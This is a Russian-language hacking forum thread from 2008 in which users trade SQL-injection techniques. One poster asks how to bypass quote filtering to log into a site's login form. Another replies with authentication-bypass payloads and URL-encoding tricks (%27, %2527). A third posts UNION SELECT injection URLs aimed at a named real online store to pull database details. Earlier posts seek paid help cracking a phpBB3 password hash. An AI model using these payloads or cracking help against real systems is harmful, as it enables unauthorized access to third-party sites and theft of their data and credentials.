27.11.2008, 15:05
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
или md5(phpbb3), что скорее всего
|
|
|
27.11.2008, 15:11
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
Значит PasswordsPro мне в руки и долгие годы ожидания и терпимости, или есть иные варианты? Сервисы не берут, в пассвордспро я такого типа хешей вообще не обнаружил, как md5(phpbb3)
Кто может помочь? Об оплате договоримся  |
|
|
|
27.11.2008, 15:16
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
http://forum.xakep.ru/m_1107118/tm.htm и еще вот тут можно почитать
|
|
|
|
27.11.2008, 15:18
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
С нами:
10198073
Репутация:
354
|
|
Спасибо. Уже вникаю =)
|
|
|
|
27.11.2008, 15:22
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 93
С нами:
9216251
Репутация:
30
|
|
_Pantera_,
Ошибки свои понял.
Спасибо!
|
|
|
|
27.11.2008, 22:12
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Пытаюсь авторизоватся по типу
email  ass
Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются
SELECT * FROM t_customer WHERE (email='admin@admin.com\') AND (password='or 1=1--')
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Как можно обойти фильтрацию и авторизоватся? |
|
|
|
27.11.2008, 22:30
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
С нами:
9875796
Репутация:
770
|
|
Сообщение от Ershik
Пытаюсь авторизоватся по типу
email ass
Мыло не знаю, поэтому ввожу от балды. Кавычки фильтруются
Как можно обойти фильтрацию и авторизоватся? По всей видимости есть sql-инъекция, попробуй найти табличку юзеров/админов, там должно быть достаточно информации, чтобы пройти авторизацию ; )
|
|
|
|
27.11.2008, 22:47
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
По логике t_customer. Я поискал, иньекция только в авторизации.
и только в поле логина
|
|
|
|
27.11.2008, 22:52
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
будет работать когда
SELECT * FROM t_customer WHERE (email='admin@admin.com' or 1=1/*) AND (password='')
обойти фильтр кавычки можна так: %27,%2527,` в разных случаях по разному, тоесть пример
mail:a@a.a%2527 or 1=1/*
pass:
Последний раз редактировалось sabe; 27.11.2008 в 22:54..
|
|
|
|
28.11.2008, 01:09
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
Понятно. еще вопрос.
__http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8.9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36/*
почему, когда хочу узнать версию базы данных, выскакиет ошибка?
___http://www.originalstore.it/index.php?page=viewprod&id=-1+UNION+SELECT+1,2,database(),4,5,6,7,8.9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
